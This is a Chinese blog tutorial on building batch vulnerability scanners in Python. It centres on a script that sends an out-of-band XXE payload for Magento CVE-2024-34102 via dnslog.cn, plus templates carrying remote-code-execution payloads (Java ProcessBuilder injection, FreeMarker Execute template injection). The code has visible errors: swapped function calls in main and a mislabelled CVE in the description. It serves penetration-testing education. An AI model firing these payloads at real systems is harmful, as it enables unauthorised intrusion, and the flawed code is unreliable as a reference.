快速编写一款python漏洞批量检测工具

最新推荐文章于 2024-09-13 19:41:31 发布
最新推荐文章于 2024-09-13 19:41:31 发布
阅读量249 收藏 3
点赞数 2
文章标签: python 开发语言 数据库 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64910183/article/details/142237472
版权

一、前言

以下列检测脚本示列:

 import requests
 import urllib3
 import re,string,random
 from urllib.parse import urljoin
 import argparse
 import time
 import ssl
 ssl._create_default_https_context = ssl._create_unverified_context
 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 
 def banner():
     print()
     print(r''' 
      ______     _______     ____   ___ ____  _  _        ____   ___ _____ __
  / ___\ \   / / ____|   |___ \ / _ \___ \| || |      |___ \ / _ \___  / /_
 | |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ __) | | | | / / '_ \
 | |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____/ __/| |_| |/ /| (_) |
  \____|  \_/  |_____|   |_____|\___/_____|  |_|      |_____|\___//_/  \___/
 
  _____
 |___  |
    / /
   / /
  /_/
     ''')
     print()
 
 def read_file(file_path):
     with open(file_path, 'r') as file:
         urls = file.read().splitlines()
     return urls
 
 def check(url):
     url = url.rstrip("/")
     taeget_url = urljoin(url, "/rest/V1/guest-carts/1/estimate-shipping-methods")
     try:
         headers = {
             "User-Agent": "Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36",
             "Content-Type": "application/json"
         }
         getdomain = requests.get(url='http://dnslog.cn/getdomain.php', headers={"Cookie": "PHPSESSID=hb0p9iqh804esb5khaulm8ptp2"}, timeout=30)
         domain = str(getdomain.text)
         data = """{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://%s","dataIsURL":true,"options":12345678}}}}}}"""%(domain)
         requests.post(taeget_url, verify=False, headers=headers, data=data, timeout=25)
         for i in range(0, 3):
             refresh = requests.get(url='http://dnslog.cn/getrecords.php', headers={"Cookie": "PHPSESSID=hb0p9iqh804esb5khaulm8ptp2"}, timeout=30)
             time.sleep(1)
             if domain in refresh.text:
                 print(f"\033[31mDiscovered:{url}:AdobeMagento_CVE-2024-34102_XXE!\033[0m")
                 return True
     except Exception as e:
         pass
 
 
 if __name__ == "__main__":
     banner()
     parser = argparse.ArgumentParser(description='AdobeColdFusion_CVE-2024-20767_ArbitraryFileRead检测脚本')
     parser.add_argument("-u", "--url",type=str, help="单个URL检测")
     parser.add_argument("-f", "--txt",type=str, help="批量URL文件加载检测")
     
     args = parser.parse_args()
     if args.url:
         read_file(args.url)
     elif args.txt:
         check(args.txt)
     else:
         parser.print_help()

以上批量检测代码的主要功能点:

1.banner函数模块,用于展示图形化标识,以美化展示脚本

2.read_file函数模块,用于批量读取文件中的url地址

3.check函数模块,用于对漏洞进行检测,这里最好使用BP进行构造,根据响应包中的返回值进行规则匹配

4.main函数模块,主要调用以上3个函数,以及引用命令行解析器 parser

二、导入python包

可使用python PyCharm Community 错误功能检测出需要导入的包

 

 import requests
 import urllib3
 import re,string,random
 from urllib.parse import urljoin
 import argparse
 import time
 import ssl
 ssl._create_default_https_context = ssl._create_unverified_context
 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

image-20240801024603100

三、函数功能模块

1.banner标识函数功能
 def banner():
     print()
     print(r''' 
       ______     _______     ____   ___ ____  _  _        _____ _  _   _  ___
  / ___\ \   / / ____|   |___ \ / _ \___ \| || |      |___ /| || | / |/ _ \
 | |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ |_ \| || |_| | | | |
 | |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____|__) |__   _| | |_| |
  \____|  \_/  |_____|   |_____|\___/_____|  |_|      |____/   |_| |_|\___/
 
  ____
 |___ \
   __) |
  / __/
 |_____|
                             ''')
     print()

功能:该函数打印出一个图形化的 banner

在线生成工具:http://www.network-science.de/ascii/

或者使用pyfiglet进行本地生成,可将生成的code在python代码中进行替换

 pip install pyfiglet
 
 C:\Users\test>pyfiglet CVE-2024-34102
   ______     _______     ____   ___ ____  _  _        _____ _  _   _  ___
  / ___\ \   / / ____|   |___ \ / _ \___ \| || |      |___ /| || | / |/ _ \
 | |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ |_ \| || |_| | | | |
 | |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____|__) |__   _| | |_| |
  \____|  \_/  |_____|   |_____|\___/_____|  |_|      |____/   |_| |_|\___/
 
  ____
 |___ \
   __) |
  / __/
 |_____|
2.read_file函数模块

功能:该函数读取指定文件中的每一行,并返回一个包含这些行内容(假设为URL)的列表

注意:该代码模块,可固定不变

 def read_file(file_path): #定义一个名为read_file的函数,该函数接受一个参数file_path,表示文件的路径
     with open(file_path, 'r') as file: 
     #使用open函数以读取模式('r')打开指定路径的文件,并将文件对象赋值给变量file。with语句确保在代码块结束后文件会自动关闭
         urls = file.read().splitlines()
         #读取文件的全部内容,并将其按行分割成一个列表。每行的内容作为列表的一个元素。splitlines()方法会移除每行的换行符
     return urls  #返回一个包含所有URL的列表
3.check函数模块

注意:这里可根据实际情况进行修改

 def check(url):
 #定义一个名为check的函数,接受一个参数url,表示要检查的URL
     url = url.rstrip("/")
     #去掉URL末尾的斜杠(如果有的话)
     taeget_url = urljoin(url, "/rest/V1/guest-carts/1/estimate-shipping-methods")
     #使用urljoin函数将给定的URL与指定路径拼接,生成目标URL
     try:
     #尝试执行以下代码块,如果发生异常则跳到except块
         headers = {
             "User-Agent": "Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36",
             "Content-Type": "application/json"
         }
         #设置HTTP请求头,headers包含User-Agent和Content-Type,Content-Type是post请求包格式
         getdomain = requests.get(url='http://dnslog.cn/getdomain.php', headers={"Cookie": "PHPSESSID=hb0p9iqh804esb5khaulm8ptp2"}, timeout=30)
         #向dnslog.cn发送一个GET请求以获取一个唯一的域名,这个域名将用来检测漏洞。
         domain = str(getdomain.text)
         #将响应内容转换为字符串并赋值给变量domain
         data = """{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://%s","dataIsURL":true,"options":12345678}}}}}}"""%(domain)
         #构造一个包含domain的JSON数据字符串,目的是利用该漏洞进行攻击
         requests.post(taeget_url, verify=False, headers=headers, data=data, timeout=25)
         #向目标URL发送一个POST请求,携带构造的JSON数据
         for i in range(0, 3): 
         #循环3次检查DNS记录是否包含该域名
             refresh = requests.get(url='http://dnslog.cn/getrecords.php', headers={"Cookie": "PHPSESSID=hb0p9iqh804esb5khaulm8ptp2"}, timeout=30)
             #向dnslog.cn发送请求以获取DNS记录
             time.sleep(1)
             if domain in refresh.text:
             #果DNS记录中包含该域名,表示漏洞存在
                 print(f"\033[31mDiscovered:{url}:AdobeMagento_CVE-2024-34102_XXE!\033[0m")
                 #打印发现漏洞的信息
                 return True
                 #返回True表示检测到漏洞
     except Exception as e:
     #如果在尝试执行上述代码时发生任何异常,捕获异常并忽略
         pass

检测函数的主要方法:

get类型

def check(url):
     url = url.rstrip("/")
     target = url+"/url路径"
     headers = {
         "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
     }
     try:
          #get请求方法
         response = urllib.request.Request(target, headers=headers, method="GET", unverifiable=True)
         res = urllib.request.urlopen(response)
         status_code = res.getcode()
         content = res.read().decode()
         if status_code == 200 and 'fonts' in content and  'extensions' in content: 
         #主要的匹配漏洞的验证规则
             print(f"\033[31mDiscovered:{url}: 漏洞状态描述,如(xxx存在rce漏洞)\033[0m")
     except Exception as e:
         pass

post类型

 def check1(url):
     url = url.rstrip("/")
     target = urljoin(url, "/url路径")
     headers = {
         "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
         "Content-Type":"application/json;charset=UTF-8"  #post数据的格式类型
     }
     #post请求数据
     data = '{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\\\"echo\\\",\\\"HelloWorldTest\\\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}'
     try:
          #POST请求方法
         response = requests.post(target, verify=False, headers=headers, data = data,timeout=15)
         if response.status_code == 200 and 'HelloWorldTest' in response.text and 'message' in response.text and 'data' in response.text:   #主要的匹配漏洞的验证规则
                 print(f"\033[31mDiscovered:{url}: 漏洞状态描述,如(xxx存在rce漏洞!\033[0m")
                 return True
     except Exception as e:
         pass
         
      
      
 def check2(url):
     url = url.rstrip("/")
     target = urljoin(url, "/jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action")
     headers = {
         "User-Agent": "Mozilla/2.0 (compatible; MSIE 3.01; Windows 95",
         "Content-Type": "application/x-www-form-urlencoded"
     }
     data = """moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%2528%2529%2528%2522arp%2520-a%2522%2529%257D%253C%252Fclob%253E&uuid=1"""
     try:
         response = requests.post(target, verify=False, headers=headers, data=data, timeout=15)
         if response.status_code == 200 and ' Internet' in response.text and '</clob>' in response.text:
          #主要的匹配漏洞的验证规则
                 print(f"\033[31mDiscovered:{url}: 漏洞状态描述,如(xxx存在rce漏洞!\033[0m")
                 return True
     except Exception as e:
         pass  

 

四、主函数功能模块

功能:调用上面函数功能

该部分是脚本的入口,解析命令行参数,如果提供了--url 参数,则单个URL检测;如果提供了--txt 参数,则,对文件中的多个URL地址进行检测

 if __name__ == "__main__":
 #调用banner函数,显示上面标识图
     banner()
     #命令行参数解析器 parser
     parser = argparse.ArgumentParser(description='AdobeColdFusion_CVE-2024-20767_ArbitraryFileRead检测脚本')
     parser.add_argument("-u", "--url",type=str, help="单个URL检测")
     parser.add_argument("-f", "--txt",type=str, help="批量URL文件加载检测")
       """
     -u: 一个可选的字符串参数,用于指定读取单个URL
     -f: 一个可选的字符串参数,用于指定读取文件中的url
     description:脚本名称显示:AdobeColdFusion_CVE-2024-20767_ArbitraryFileRead检测脚本
     """
     args = parser.parse_args()  #调用 parse_args() 方法解析命令行输入的参数,并将解析结果存储在 args 对象中
     if args.url:
         read_file(args.url) 
         #如果提供了-u 参数,调用read_file(args.url) 函数,单个URL检测。
     elif args.txt:
         check(args.txt)
         #如果提供了--txt 参数,调用 check(args.txt)函数,对文件中的多个URL地址进行检测
     else:
         parser.print_help() 
         #如果没有提供任何参数,调用 parser.print_help() 打印帮助信息,提示用户如何使用该脚本

五、脚本运行展示效果

image-20240801042010871

渗透测试中心
关注
Python-一款集http端口扫描和目录批量扫描为一体的自动化工具
08-10
"Python-一款集http端口扫描和目录批量扫描为一体的自动化工具"就是这样一个利用Python编写的实用工具,它结合了两种常见的网络安全扫描功能:端口扫描和目录扫描。 端口扫描是网络渗透测试和安全审计中的基础步骤...
coremali扫描工具(批量和单个url)
08-03
该工具主要针对的是Coremail邮件系统,是一款Python3环境下运行的漏洞验证工具。Coremail是中国知名的电子邮件服务提供商,广泛应用于企事业单位和教育机构。由于网络环境中存在各种安全风险,确保邮件系统的安全...
自己动手编写SQL注入漏洞扫描器
12-24
### 自己动手编写SQL注入漏洞扫描器 #### 功能需求分析与实现思路 **功能需求:** 1. **支持单个/批量网站扫描** - 单个网站扫描功能是基本要求,它允许用户对特定目标进行深入检测。 - 批量网站扫描功能对于...
CodeTest自动生成POC刷漏洞工具
02-28
CodeTest是一款自动化安全测试工具,主要用于自动生成Proof of Concept(POC)来检测软件系统中的安全漏洞。在IT行业中,POC是证明一个安全漏洞确实存在的一种技术验证,它通常是一段代码或脚本,当运行时能复现漏洞...
Python-打印机利用工具包
08-10
这个工具包,称为PRET(Printer Exploitation Toolkit),由Python编程语言编写,旨在帮助用户发现并利用打印机可能存在的漏洞。在网络安全日益重要的今天,了解并使用这样的工具对于保护组织和个人的打印设备至关...
蒙特卡罗方法——布丰投针实验近似计算圆周率python代码实现
2301_79376014的博客
09-09 462
蒙特卡罗——布丰实验
车辆检测与分类系统源码分享
xuehaikj的博客
09-13 1155
数据集信息展示在本研究中,我们采用了名为“comexit”的数据集,以支持对YOLOv8模型在车辆检测与分类任务中的改进。该数据集专注于交通工具的识别,特别是公共交通和货运车辆,具有明确的应用背景和实用价值。数据集的类别数量为三,具体包括“bus”(公交车)、“car”(小汽车)和“truck”(卡车)。这三类车辆在城市交通和物流系统中扮演着重要角色,因此,准确的检测与分类对于交通管理、智能交通系统以及自动驾驶技术的发展具有重要意义。
opencv学习:calcHist 函数绘制图像直方图及代码实现
最新发布
mohanyelong的博客
09-13 769
opencv学习:calcHist 函数绘制图像直方图及代码实现
Python实现多线程、多进程及协程
qq_42568323的博客
09-09 1058
本文详细介绍了 Python 中多线程、多进程和协程的并发模型及其实现方式,并通过具体场景演示了如何使用面向对象思想实现这些模型。在实际应用中,应根据任务的类型和需求选择合适的并发模型,从而优化程序的性能和资源利用率。本文将详细介绍 Python 中的多线程、多进程和协程的概念及其实现方式,并通过具体场景展示如何在 Python 中使用面向对象的思想实现这些并发模型。接下来,我们通过一个计算密集型任务的示例来演示多进程的实现:计算一系列大数字的阶乘。主程序中创建并启动了多个计算进程,并使用。
pip-tools:打造可重复、可控的 Python 开发环境,解决依赖关系,让代码更稳定
weixin_53707653的博客
09-09 814
是一个强大且易用的工具,可以帮助开发者轻松管理 Python 项目的依赖关系,确保代码的可重复性和稳定性。是一组命令行工具,旨在简化 Python 依赖关系的管理,确保项目环境的稳定性和可重复性。可以确保每次构建环境时都使用相同的依赖项版本,从而避免由于依赖项版本不一致导致的错误,提高代码可重复性和稳定性。自动化了依赖关系管理过程,节省了开发者的时间和精力,可以将更多时间投入到实际的开发工作中。文件中的信息,更新虚拟环境,安装、升级或卸载所需的软件包,确保虚拟环境与。命令可以从你的项目配置文件中生成。
程序的格式框架与缩进
qq_57335683的博客
09-08 372
在上一课时中,我们介绍了 Python 的基本概念,并成功运行了第一个 Python 程序。本课时将深入探讨 Python 程序的基本结构、缩进的重要性,以及如何正确使用注释。通过本课时的学习,你将更好地理解 Python 代码的组织方式,并能够避免一些常见的编程错误。通过本课时的学习,你了解了 Python 程序的基本结构,认识到缩进在 Python 中的重要性,并学会了如何避免常见的缩进错误。缩进不仅是 Python 代码风格的一部分,而且是语法的一部分。这意味着如果缩进不正确,程序将无法正常运行。
币安/OK现货合约量化系统APP开发
I592O929783的博客
09-08 598
后端:考虑系统需要处理大量实时数据和高频交易的特点,选择高性能的编程语言和技术框架,如Python的Django或Flask框架,Java的Spring Boot等。用户交互界面:设计直观易用的用户交互界面,包括交易界面、策略配置界面、风险管理界面等,方便用户进行交易操作、策略配置和风险管理。市场数据接入:开发市场数据接入模块,从币安等交易所或数据服务商获取实时的市场数据,包括行情数据、订单簿数据、成交数据等。前端:选择适合开发复杂界面的前端框架,如React、Vue.js等,以提供用户友好的交互界面。
Python 检测人脸筛选指定尺寸人脸图片
刚刚入门的小码农
09-09 604
主要功能是处理一个指定文件夹中的所有图像文件(.jpg和.png),并根据图像中检测到的人脸特征,筛选和移动符合条件的图像。
JIT编译器
Flying_Fish_roe的博客
09-11 536
JIT(Just-In-Time,实时编译)编译器是 Java 虚拟机(JVM)中的一项重要技术,用于将 Java 字节码(Bytecode)在运行时动态编译为机器码。Java 程序最初通过编译器(如javac)将源代码编译为字节码,字节码在 JVM 中解释执行。然而,由于解释执行每次都需要逐条翻译字节码指令为机器指令,这种方式效率较低。为了解决性能问题,JIT 编译器在程序运行时将热点代码编译为机器码,从而提高运行效率。JIT 编译器是 Java“编译型”和“解释型”语言的结合特性的重要体现之一。
【AIGC】对AI编程常用的工具提供简要介绍和应用场景
weixin_51306394的博客
09-08 1661
I编程工具的选择和使用对于构建高效的机器学习和深度学习系统至关重要。这些工具涵盖了从数据处理、模型训练、模型优化到模型部署的各个环节。下面是一个全面的AI编程工具合集,按功能分类列出了一些常用的工具,并提供了简要介绍和应用场景。
pip 阿里云镜像报错 certificate verify failed: unable to get local issuer certificate
m0_74253823的博客
09-10 417
在没有管理员身份,且有防火墙限制的电脑上,pip安装​python库包失败。​但是在普通的电脑上安装正常。​解决方案:本地电脑上信任宿主主机trusted-host。
如何在Flask中处理错误
sheji888的专栏
09-09 1242
在Flask中处理错误是确保Web应用健壮性和用户体验的重要部分。错误处理不仅涉及捕获和响应服务器或客户端生成的错误,还包括为这些错误提供有意义的反馈,无论是向开发者报告(如调试信息)还是向最终用户展示(如友好的错误页面)。由于篇幅限制,我无法直接撰写5000字的详尽文档,但我可以概述在Flask中处理错误的关键步骤和策略,并提供一些示例代码,帮助你理解如何在你的Flask应用中实现这些策略。
python 实现第k个字典排列算法
luthane的博客
09-07 456
"第k个字典排列"算法通常指的是在给定的字符集合(例如,字符串中的字符)中,找到所有可能排列的第k个排列。这个问题可以通过多种方法解决,但一个常见且高效的方法是使用“下一个排列”算法的变种,或称为“第k个排列”的直接算法。方法一:使用“下一个排列”的变种生成所有排列:首先生成所有排列,但显然这种方法对于较大的输入集合是不切实际的,因为它涉及到大量的计算和存储。排序并使用“下一个排列”:我们可以先将字符串排序(字典序最小的排列),然后调用k-1次“下一个排列”算法,直到得到第k个排列。
嵌入式Linux电池管理(TODO)
fanged的专栏
09-12 430
(TODO)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

渗透测试中心

各位师傅,觉得文章不错可支持下

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值